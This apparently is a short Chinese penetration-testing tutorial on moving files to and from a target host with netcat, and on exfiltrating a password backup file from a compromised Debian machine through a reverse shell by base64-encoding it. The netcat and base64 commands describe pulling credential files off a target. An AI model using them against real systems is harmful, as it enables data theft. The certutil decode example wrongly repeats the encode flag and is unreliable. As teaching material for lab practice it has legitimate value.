【主機滲透】通過nc、或者base64編碼從服務器上上傳、下載文件

通過nc從目標機上上傳、下載文件:

1、下載文件,文件在192.168.110.2服務器上,下載文件到192.168.110.1服務器

// 在 192.168.110.2(這臺主機監聽 5555 端口(注意符號是 "<" )
# nc -l 5555 < download.txt
​
// 在 192.168.110.1 這臺主機下載文件(注意符號是 ">" )
# nc --recv-only 192.168.110.2 5555 > download.txt

2、上傳文件,文件在192.168.110.1服務器上,上傳文件到192.168.110.2服務器

// 在 192.168.110.2 這臺主機監聽 5555 端口(注意符號是 ">" )
# nc -l 5555 > upload.txt
​
// 在 192.168.110.1 這臺主機上傳文件(注意符號是 "<" )
# nc --send-only 192.168.110.2 5555 < upload.txt

 

通過base64編碼的方式在反彈的shell上上傳、下載文件:

環境:

目標機:Debian 4.9.30,ip:192.168.110.2,目標文件:/home/jim/backups/old-passwords.bak

下載機:kali 2020

下載步驟:

1、在已連接的shell上,對目標文件進行base64編碼

base64 old-passwords.bak

uploading.4e448015.gif正在上傳…重新上傳取消

base64工具語法:

  • 對字符串編碼、解碼:

# 編碼
echo -n "hello" | base64
# 解碼
echo -n "hello" | base64 -d
  • 對文件內容編碼、解碼:

# 編碼
base64 file.txt
# 解碼
base64 -d file.txt

如果目標機是windows系統,可使用windows自帶的certutil.exe工具進行base64編碼,命令如下:

# 編碼
certutil -encode originalFile.txt targetFile.txt
# 解碼
certutil -encode originalFile.txt targetFile.txt

2、將base64編碼保存到一個txt文件下,並執行解碼命令

base64 -d pass.txt

uploading.4e448015.gif正在上傳…重新上傳取消

上傳文件同理

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章